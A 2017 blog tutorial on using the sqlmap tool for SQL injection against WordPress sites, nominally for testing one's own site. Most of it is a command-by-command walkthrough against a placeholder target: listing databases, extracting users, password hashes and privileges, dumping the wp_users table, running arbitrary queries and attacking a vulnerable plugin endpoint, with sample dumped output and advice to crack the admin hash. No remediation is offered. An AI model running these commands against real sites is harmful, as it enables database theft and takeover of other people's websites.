• Home
  • Archive
  • Tools
  • Contact Us

The Customize Windows

Technology Journal

  • Cloud Computing
  • Computer
  • Digital Photography
  • Windows 7
  • Archive
  • Cloud Computing
  • Virtualization
  • Computer and Internet
  • Digital Photography
  • Android
  • Sysadmin
  • Electronics
  • Big Data
  • Virtualization
  • Downloads
  • Web Development
  • Apple
  • Android
Advertisement
You are here: Home » sqlmap Tutorial : WordPress SQL Injection Testing (White Hat)

By Abhishek Ghosh July 9, 2017 1:06 pm Updated on July 9, 2017

sqlmap Tutorial : WordPress SQL Injection Testing (White Hat)

Advertisement

We talked about SQL injection in older article. Here is a sqlmap tutorial for WordPress SQL injection testing for the beginners to test own website for potential vulnerabilities & fix them. This website and tutorial is intended for White Hat purposes only. Of course trying them upon others vulnerable WordPress installation will find the points and at the end it is possible to hack it. That is not we are teaching. We are teaching to test them on own websites – live or custom created for test. We can only teach the basics, to create an understanding of how the real tool with real hacker works.

sqlmap Tutorial WordPress SQL Injection Testing White Hat

Whether you can research, use proxy, use safe strategies to protect from Governmental spyware that is dependent on your future growing knowledge. This is official website of salmap :

Vim
1
2
http://sqlmap.org
https://github.com/sqlmapproject/sqlmap/wiki/Usage

Basic theory is that – WordPress has URLs with the syntax /vulnerable.php?id=IDIOT. sqlmap is a suitable tool to extort good amount of information which the site owner dislikes to disclose.

Advertisement

---

 

sqlmap Tutorial : WordPress SQL Injection Testing

 

For the most it is practical to use SSH screen aka own server to run test. So SSH to your server and become root user. Change directory to somewhere like /tmp. Clone the official repo of sqlmap :

Vim
1
2
3
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
cd sqlmap*
ls -al

You’ll notice that there are files like sqlmap.conf, sqlmap.py, sqlmapapi.py. If we run :

Vim
1
2
python sqlmap.py -h
python sqlmap.py -hh

then obviously the tool will show usage options. Your target site is fools-site.com, that site has URL like :

Vim
1
http://fools-site.com/moronic.php?id=69

Basically /moronic.php?id=69 should become /moronic/ with a 301 redirection. Although that forgetting escape is not only usage, salmap can nicely run against the submit form URLs like :

Vim
1
http://fools-site.com/form_submit.php

You can see that we have no comment form, the search is actually on other server. Of course we have contact us page. If we do not have comment, many problems get reduced. Anyway, run this :

Vim
1
sqlmap -u http://fools-site.com/moronic.php?id=69 –dbs

We have ran exploit using SQL Injection. You have to read the return output carefully, you should have retrieved two database name from that site. The one database is Information_schema and the other one we do not know, you will find. When database name is know then password is only unknown. What that database has you’ll get with these commands :

Vim
1
2
3
python sqlmap.py -u "http://fools-site.com/moronic.php?id=69" -b
python sqlmap.py -u "http://fools-site.com/moronic.php?id=69" --users --passwords --privileges --roles --threads=10
python sqlmap.py -u "http://fools-site.com/moronic.php?id=69" --current-user --is-dba --current-db --hostname --threads=10

Take that another database name is fools_db, then we can restive tables :

Vim
1
sqlmap -u http://fools-site.com/moronic.php?id=69 -D fools_db –tables

You can retrieve users, admin, payment info from above example. If you run :

Vim
1
python sqlmap.py -u "http://fools-site.com/moronic.php?id=69" --dump -D fools_db -T users

You’ll feel as if the database server is yours :

Vim
1
2
3
4
5
+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+
| id | hash               | name      | email     | password | permission | system_home | system_allow_only |
+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+
| 1  | 7QtzDHFO8nDvP900nu | admin     | <blank>   | <blank>  | 3          | <blank>     | <blank>           |
+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+

You have to crack the 7QtzDHFO8nDvP900nu hash to get text password. Specially for WordPress it can go :

Vim
1
sqlmap --dbms=MySQL -u http://fools-site.com/moronic.php?id=69 -p id -D fools_db -T wp_users --dump

You can run some commands like the site owner :

Vim
1
python sqlmap.py -u "http://fools-site.com/moronic.php?id=69" --sql-query="select now();"

If there is a vulnerable plugin, this is a funny command :

Vim
1
2
sqlmap -u "http://fools-site.com/wp-admin/admin-ajax.php"
--data="action=spAjaxResults&PLUGIN-NAME=2" --dump -T wp_users -D wordpress --threads=10 --random-agent --dbms=mysql --level=5 --risk=3

Tagged With sqlmap wordpress , sqlmap tutorial , wordpress sqlmap , sqlmap on wordpress , paperuri:(8e062e8eaa676ca98268a6729071a1a5) , list of architects yandex ru loc:US , sql injection wordpress python , https://yandex ru/clck/jsredir?from=yandex ru;search;web;;&text=&etext=1835 4_0ZXLl16xGOfD8iATSpmi1dmkQ-Onqepzhwi3-y3MttvzQlTG9qjHCutTTyPKrN 451ff07c364be38fad70721c4dd208273bb99ef8&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXme , https://yandex ru/clck/jsredir?from=yandex ru;search;web;;&text=&etext=1831 D5WJ-goz2X19m8kuhgkVf0DNYRqyqYRoaRPoxa82kBdsiSjSGFDernYtNtTl1MSS 785d8c387b0b8ccf4587902f5e78d05e89dd92f0&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXme , hack wordpress website using sqlmap

This Article Has Been Shared 291 Times!

Facebook Twitter Pinterest
Abhishek Ghosh

About Abhishek Ghosh

Abhishek Ghosh is a Businessman, Orthopaedic Surgeon, Author and Blogger. You can keep touch with him on Twitter - @AbhishekCTRL.

Here’s what we’ve got for you which might like :

Articles Related to sqlmap Tutorial : WordPress SQL Injection Testing (White Hat)

  • Managing and Delivering Podcast Audio and Video From WordPress

    Managing and Delivering Podcast Audio and Video From WordPress can be easily be done in an advanced setup plus you can use CDN or deliver YouTube Video as well.

  • Remove Junks From WordPress Header

    Remove RSD Link, RSS Feed, WordPress version, Version of Scripts & All Possible Junks From WordPress Header. Create Own Head & Shoulder Plugin.

  • Fix WordPress mainContentOfPage Schema Error (Genesis)

    The New Google Structured Data Testing Tool Gives Error Against Genesis HTML5 Child Themes. Commenting Out Three Lines Will Fix This Issue.

  • Share WordPress Post Preview Via Cloud Storage

    No Plugin is Required. Here is a Ready to Use Method to Share WordPress Post Preview Via Cloud Storage Like OpenStack Swift of DropBox Cloud.

  • Use WordPress SEO News Extension as Free Software

    Google News Extension comes with Free Software License. You Can Use WordPress SEO News Extension For Free By Ex-DMOZ Editor Joost de Valk.

Additionally, performing a search on this website can help you. Also, we have YouTube Videos.

Take The Conversation Further ...

We'd love to know your thoughts on this article.
Meet the Author over on Twitter to join the conversation right now!

If you want to Advertise on our Article or want a Sponsored Article, you are invited to Contact us.

Contact Us

Subscribe To Our Free Newsletter

You can subscribe to our Free Once a Day, Regular Newsletter by clicking the subscribe button below.

Click To Subscribe

Please Confirm the Subscription When Approval Email Will Arrive in Your Email Inbox as Second Step.

Search this website…

 

Popular Articles

Our Homepage is best place to find popular articles!

Here Are Some Good to Read Articles :

  • Cloud Computing Service Models
  • What is Cloud Computing?
  • Cloud Computing and Social Networks in Mobile Space
  • ARM Processor Architecture
  • What Camera Mode to Choose
  • Indispensable MySQL queries for custom fields in WordPress
  • Windows 7 Speech Recognition Scripting Related Tutorials

Social Networks

  • Pinterest (20K Followers)
  • Twitter (4.9k Followers)
  • Facebook (5.8k Followers)
  • LinkedIn (3.7k Followers)
  • YouTube (1.2k Followers)
  • GitHub (Repository)
  • GitHub (Gists)
Looking to publish sponsored article on our website?

Contact us

Recent Posts

  • Arduino : Independently Blink Multiple LED January 18, 2021
  • What is a Loosely Coupled System? January 17, 2021
  • How To Repack Installed Software on Debian/Ubuntu January 16, 2021
  • Components of Agile Software Development January 15, 2021
  • What is Conway’s Law? January 14, 2021

 

About This Article

Cite this article as: Abhishek Ghosh, "sqlmap Tutorial : WordPress SQL Injection Testing (White Hat)," in The Customize Windows, July 9, 2017, January 19, 2021, https://thecustomizewindows.com/2017/07/sqlmap-tutorial-wordpress-sql-injection-testing-white-hat/.

Source:The Customize Windows, JiMA.in

 

This website uses cookies. If you do not want to allow us to use cookies and/or non-personalized Ads, kindly clear browser cookies after closing this webpage.

Read Cookie Policy.

PC users can consult Corrine Chorney for Security.

Want to know more about us? Read Notability and Mentions & Our Setup.

Copyright © 2021 - The Customize Windows | dESIGNed by The Customize Windows

Copyright  · Privacy Policy  · Advertising Policy  · Terms of Service  · Refund Policy